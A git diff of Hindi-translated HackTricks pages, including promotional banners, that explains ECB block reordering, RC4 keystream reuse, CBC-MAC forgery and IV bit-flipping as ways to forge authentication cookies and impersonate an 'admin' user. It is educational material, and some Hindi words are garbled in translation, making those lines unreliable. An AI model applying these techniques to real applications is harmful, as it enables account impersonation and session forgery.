@ -1,46 +1,46 @@
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
# ECB # ECB
(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक ब्लॉक को साफ पाठ के ब्लॉक से बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि स्पष्ट पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल एक ही कुंजी का उपयोग करके प्रत्येक स्पष्ट पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है। (ECB) इलेक्ट्रॉनिक कोड बुक - सममित एन्क्रिप्शन स्कीम जो **प्रत्येक ब्लॉक को क्लियर पाठ** को **साइपरटेक्स्ट के ब्लॉक से** बदल देता है। यह **सबसे सरल** एन्क्रिप्शन स्कीम है। मुख्य विचार यह है कि क्लियर पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल कुंजी का उपयोग करके प्रत्येक क्लियर पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है।
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
ECB का उपयोग करने के कई सुरक्षा प्रभाव होते हैं: ECB का उपयोग करने के कई सुरक्षा प्रभाव हैं:
* **एन्क्रिप्टेड संदेश से ब्लॉक हटा दिए जा सकते हैं** * **एन्क्रिप्टेड संदेश से ब्लॉक हटा सकते हैं**
* **एन्क्रिप्टेड संदेश से ब्लॉक चले जा सकते हैं** * **एन्क्रिप्टेड संदेश से ब्लॉक चले जा सकते हैं**
# सुरक्षा दोष का पता लगाना # सुरक्षा दोष का पता लगाना
कल्पना करें कि आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\ कल्पना करें आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\
फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\ फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\
आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान है, **बराबर** हैं। तब, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है** आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान हैं, **बराबर** हैं। तो, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**
जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है।
``` ```
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
``` ```
यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। वे **ब्लॉक** जो **विभिन्न** हैं, वे उन ब्लॉक्स हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में कोई आवश्यक भिन्नता)। यह इसलिए है क्योंकि **कुकीज़ का उपयोगकर्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल था** (उदाहरण के लिए)। **विभिन्न ब्लॉक** वे ब्लॉक हैं जिनमें **कम से कम 1 विभिन्न वर्ण शामिल था** (शायद विभाजक "|" या उपयो्ता नाम में आवश्यक भिन्नता)।
अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह **कई उपयोक्ता नाम** उत्पन्न कर सकता है **जिनमें समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए: अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयो्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयो्ता नाम>` है। इसके लिए, वह बस **कई उपयो्ता नाम** उत्पन्न कर सकता है जिनमें **समान और लंबे उपयो्ता नाम और पासवर्ड** हों जब तक वह प्रारूप और विभाजक की लंबाई का पता नहीं लगा लेता है:
| उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): | | उपयो्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयो्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): |
| ---------------- | ---------------- | ------------------------- | --------------------------------- | | ---------------- | ---------------- | ------------------------- | --------------------------------- |
| 2 | 2 | 4 | 8 | | 2 | 2 | 4 | 8 |
| 3 | 3 | 6 | 8 | | 3 | 3 | 6 | 8 |
@ -52,7 +52,7 @@ ECB का उपयोग करने के कई सुरक्षा प
## पूरे ब्लॉक हटाना ## पूरे ब्लॉक हटाना
कुकी के प्रारूप को जानकर (`<उपयक्त >|<सवर्ड>`), उपयोक्ता नाम `एडमिन` का अनुकरण करने के लिए एक नया उपयोक्ता बनाएं `aaaaaaaaadmin` और कुकी प्राप्त करें और इसे डिकोड करें: कुकी के प्रारूप को जानकर (`<उपय्त >|<सवर्ड>`), उपयोगकर्ता नाम `admin` का अनुकरण करने के लिए एक नया उपयो्ता बनाएं `aaaaaaaaadmin` और कुकी प्राप्त करें और इसे डिकोड करें:
``` ```
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
``` ```
@ -61,19 +61,19 @@ ECB का उपयोग करने के कई सुरक्षा प
``` ```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
``` ```
## ब्लॉक्स को हटाना ## ब्लॉक्स को ले जाना
कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_ कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना एक ही बात है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_
इसलिए, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है: तो, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है:
* एक उपयोगकर्ता नाम जेनरेट करें जो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक साइज के साथ आप `username ` नामक उपयोगकर्ता नाम जेनरेट कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को जेनरेट करेगा। * एक उपयोगकर्ता नाम जेनरेट करें जो इस प्रकार हो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक साइज के साथ आप `username ` नामक उपयोगकर्ता उत्पन्न कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को उत्पन्न करेगा।
* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता नाम और रिक्त स्थानों को भरेगा, जिसे हम अनुकरण करना चाहते हैं, जैसे: `admin ` * फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता को अनुकरण करने और रिक्त स्थानों को भरने के लिए ब्लॉक्स की एक सटीक संख्या में होगा, जैसे: `admin `
इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता नाम का नकली है): `username |admin ` इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता का अनुकरण कर रहा है): `username |admin `
** फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`** **फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`**
# संदर्भ ## संदर्भ
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं। यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं।
@ -20,3 +21,22 @@
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
{% endhint %}

View file

@ -1,29 +1,30 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर जमा करके**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# CBC # CBC
यदि **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** **ब्रूटफोर्स** कर सकते हैं। अगर **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**एडमिन**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** **ब्रूटफोर्स** कर सकते हैं।
# CBC-MAC # CBC-MAC
रहस्यमयता में, एक **साइफर ब्लॉक चेनिंग संदेश प्रमाणीकरण कोड** (**CBC-MAC**) एक तकनीक है जिसका उपयोग एक ब्लॉक साइफर से संदेश प्रमाणीकरण कोड निर्मित करने के लिए किया जाता है। संदेश को कुछ ब्लॉक साइफर एल्गोरिदम के साथ सीबीसी मोड में एन्क्रिप्ट किया जाता है ताकि प्रत्येक ब्लॉक पिछले ब्लॉक के सही एन्क्रिप्शन पर निर्भर हो। यह आपसी आश्रितता सुनिश्चित करता है कि किसी भी प्लेनटेक्स्ट **बिट्स** में कोई **परिवर्तन** होने पर **अंतिम एन्क्रिप्टेड ब्लॉक** को एक ऐसे तरीके से **परिवर्तित** करेगा जिसे पूर्वानुमान या ब्लॉक साइफर कुंजी को नहीं जानकर नहीं रोका जा सकता **साइफर ब्लॉक चेनिंग मैसेज प्रमाणीकरण कोड** (**CBC-MAC**) एक विधि है जो गुप्तशास्त्र में प्रयोग की जाती है। यह एक संदेश लेकर उसे ब्लॉक द्वारा एन्क्रिप्ट करने के द्वारा काम करता है, जहां प्रत्येक ब्लॉक की एन्क्रिप्शन पिछले ब्लॉक से जुड़ी होती है। यह प्रक्रिया एक **ब्लॉकों की श्रृंखला** बनाती है, जिससे सुनिश्चित होता है कि मूल संदेश के एक भी बिट को बदलने से एन्क्रिप्ट किए गए डेटा के अंतिम ब्लॉक में एक अपूर्व परिवर्तन होगा। इस परिवर्तन को बनाने या उलटने के लिए, एन्क्रिप्शन कुंजी की आवश्यकता होती है, जो सुरक्षा सुनिश्चित करती है
संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को सीबीसी मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक संदेश का CBC-MAC की गणना करने की रूपरेखा दी गई है![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ: संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को CBC मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ ब्लॉकों से बने संदेश![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) की CBC-MAC की गणना की गई है:
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
# सुरक्षा दोष # सुरक्षा दोष
@ -33,49 +34,50 @@ CBC-MAC के साथ आम तौर पर **इस्तेमाल क
* `E(m1 XOR 0) = s1` * `E(m1 XOR 0) = s1`
* `E(m2 XOR 0) = s2` * `E(m2 XOR 0) = s2`
फिर m1 और m2 को जोड़कर बनाया गया संदेश (m3) 2 हस्ताक्षर (s31 और s32) उत्पन्न करेगा: फिर, m1 और m2 को जोड़कर बनाए गए संदेश (m3) 2 हस्ताक्षर (s31 और s32) उत्पन्न करेगा:
* `E(m1 XOR 0) = s31 = s1` * `E(m1 XOR 0) = s31 = s1`
* `E(m2 XOR s1) = s32` * `E(m2 XOR s1) = s32`
**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए गणना किया जा सकता है।** **जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए भी गणना की जा सकती है।**
सोचिए आप **8 बाइट** ब्लॉक में नाम **प्रशासक** को एन्क्रिप्ट कर रहे हैं: सोचिए आप **8 बाइट** ब्लॉक में नाम **व्यवस्थापक** को एन्क्रिप्ट कर रहे हैं:
* `Administ` * `एडमिनिस्ट`
* `rator\00\00\00` * `रेटर\00\00\00`
आप उपयोगकर्ता नाम **Administ** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\ आप उपयोगकर्ता नाम **एडमिनिस्ट** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\
फिर, आप `rator\00\00\00 XOR s1` के परिणाम को उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\ फिर, आप `रेटर\00\00\00 XOR s1` के परिणाम के नाम को बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\
अब, आप s32 का उपयोग **प्रशासक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं। अब, आप s32 का उपयोग **व्यवस्थापक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं।
### सारांश ### सारांश
1. उपयोगकर्ता नाम **Administ** (m1) का हस्ताक्षर प्राप्त करें जो s1 है 1. उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर प्राप्त करें जो s1 है
2. उपयोगकर्ता नाम **rator\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**.** 2. उपयोगकर्ता नाम **रेटर\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है****
3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **प्रशासक** के लिए एक मान्य कुकी होगी। 3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **व्यवस्थापक** के लिए एक मान्य कुकी होगी।
# हमला नियंत्रण IV # हमला नियंत्रण IV
यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\ यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\
यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**प्रशासक**" का उपयोगकर्ता बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\ यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करने के लिए आप उपयोगकर्ता "**व्यवस्थापक**" बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\
अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **प्रशासक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **प्रशासक** के उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी। अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **व्यवस्थापक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **व्यवस्थापक** उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी।
# संदर्भ ## संदर्भ
अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) अधिक जानकारी के लिए [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) में देखें।
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
